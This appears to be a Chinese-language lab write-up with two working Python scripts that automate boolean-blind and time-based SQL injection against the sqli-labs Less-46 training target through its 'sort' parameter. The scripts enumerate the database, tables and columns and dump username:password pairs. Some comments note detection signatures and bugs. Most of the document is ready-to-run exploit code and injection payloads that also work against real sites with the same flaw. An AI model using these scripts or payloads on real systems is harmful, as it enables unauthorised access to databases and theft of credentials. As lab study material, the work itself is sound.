实践环境基于 sqli-labs 靶场的第 46 关进行
bool盲注
代码如下:
import requests
from bs4 import BeautifulSoup
# 定义获取用户名的函数,使用 BeautifulSoup 解析 HTML 页面,提取用户名信息
def get_username(resp):
    """Return the text of the table cell at a fixed CSS path in a Less-46 page.

    Args:
        resp: the HTML body of the HTTP response, as text.

    Returns:
        The ``.text`` of the first element matching the selector below, or
        ``None`` when the page has no such element. The caller uses the
        presence/absence of this cell (compared against 'Dumb') as its oracle.
    """
    document = BeautifulSoup(resp, 'html.parser')
    cells = document.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')
    # An empty match list is the "not found" case; any other failure propagates.
    if not cells:
        return None
    return cells[0].text
# 定义布尔盲注的通用函数,可用于获取不同类型的信息(数据库名、表名、列名、数据等)
def boolean_blind_injection(query_template):
    """Recover a string one character at a time through a boolean oracle.

    ``query_template`` is a URL format string with ``{pos}`` (1-based character
    position) and ``{mid}`` (comparison value) placeholders. Whether the parsed
    page shows the username 'Dumb' decides the branch of a binary search over
    the printable ASCII range, so each character costs up to ~7 GET requests to
    the same endpoint — in access logs that repeated ``sort=if(...)`` pattern
    against one URL is the signature to alert on.

    Args:
        query_template: format string producing the request URL.

    Returns:
        The recovered string; the partial result is printed after every character.
    """
    result = ''
    position = 1
    while True:
        # Binary search over printable ASCII (32..126) for the character at `position`.
        left = 32
        right = 127
        while left < right:
            mid = (left + right) // 2
            url = query_template.format(pos=position, mid=mid)
            try:
                # NOTE(review): no timeout is passed, so an unresponsive server blocks here indefinitely.
                resp = requests.get(url)
                username = get_username(resp.text)
                if username == 'Dumb':
                    # Presumably the row order that puts 'Dumb' first is the injected IF()'s
                    # true branch, i.e. the character's code is greater than `mid`.
                    left = mid + 1
                else:
                    right = mid
            except requests.RequestException as e:
                print(f"Request error: {e}")
                # Only the inner search is abandoned; the outer loop still inspects `left`,
                # so a mid-search failure can append a wrong character.
                break
        if left == 32:
            # No value >= 32 satisfied the oracle: taken as "past the end of the string".
            break
        result += chr(left)
        position += 1
        print(result)
    return result
if __name__ == '__main__':
    # Request templates for Less-46; boolean_blind_injection() fills `{pos}` and `{mid}`.
    # Each one targets a different enumeration stage (schema name, tables, columns, rows).
    database_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr(database(),{pos},1))>{mid},id,username) -- "
    table_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{pos},1))>{mid},id,username) -- "
    column_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{pos},1))>{mid},id,username) -- "
    data_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) from users),{pos},1))>{mid},id,username) -- "

    # Only the database-name stage runs as shipped; the later stages stay commented out.
    boolean_blind_injection(database_query)
    # boolean_blind_injection(table_query)
    # boolean_blind_injection(column_query)
    # boolean_blind_injection(data_query)
时间盲注
代码如下:
import requests
import time
# 配置参数
# Timing parameters used by time_injection().
SLEEP_TIME, THRESHOLD = 3, 1.5  # injected SLEEP() seconds; latency above THRESHOLD reads as "true"
TIMEOUT = 2 + SLEEP_TIME  # per-request timeout handed to requests (a timeout also reads as "true")
def time_injection(query_template):
    """Recover a string one character at a time through a timing oracle.

    ``query_template`` is a URL format string with ``{pos}``, ``{mid}`` and
    ``{sleep}`` placeholders. A response slower than THRESHOLD seconds (or a
    request timeout) is read as "the injected comparison held". Each character
    needs up to ~7 GETs and every "true" probe stalls the server for
    SLEEP_TIME seconds, so a burst of slow requests to one endpoint carrying
    ``SLEEP(`` in the query string is what a defender should look for.

    Args:
        query_template: format string producing the request URL.

    Returns:
        The recovered string; progress is printed after each character.
    """
    result = ""
    pos = 1
    session = requests.Session()
    while True:
        # Binary search over printable ASCII (32..126); `high` ends on the matched code.
        low, high = 32, 126
        current_char = None  # assigned but never read
        while low <= high:
            mid = (low + high) // 2
            payload = query_template.format(
                pos=pos,
                mid=mid,
                sleep=SLEEP_TIME
            )
            try:
                # Wall-clock timing: network jitter or a clock step can flip the oracle.
                start = time.time()
                session.get(payload, timeout=TIMEOUT)
                cost = time.time() - start
                if cost > THRESHOLD:
                    # Slow response: the character's code is greater than `mid`.
                    low = mid + 1
                else:
                    high = mid - 1
            except requests.exceptions.Timeout:
                # Exceeding TIMEOUT (SLEEP_TIME + 2 s) is also treated as "condition held".
                low = mid + 1
            except Exception as e:
                print(f"请求错误: {e}")
                # Only the inner search is abandoned; the outer loop still inspects `high`.
                break
        if high >= 32 and high <= 126:
            # `high` settled on a printable code; 31 means nothing matched (end of string).
            result += chr(high)
            print(f"[*] 当前结果: {result}")
            pos += 1
        else:
            break
    return result
if __name__ == '__main__':
    # Request templates keyed by the stage name shown in the progress output;
    # time_injection() fills `{pos}`, `{mid}` and `{sleep}` in that order.
    templates = {
        '数据库': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR(database(),{pos},1))>{mid},SLEEP({sleep}),0)",
        '表名': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()),{pos},1))>{mid},SLEEP({sleep}),0)",
        '列名': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users'),{pos},1))>{mid},SLEEP({sleep}),0)",
        '数据': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(username,0x7e,password) FROM users),{pos},1))>{mid},SLEEP({sleep}),0)"
    }
    # Stages run in insertion order; each result is printed once it is complete.
    for name in templates:
        print(f"\n[+] 正在爆破 {name}...")
        data = time_injection(templates[name])
        print(f"[+] {name} 结果: {data}\n")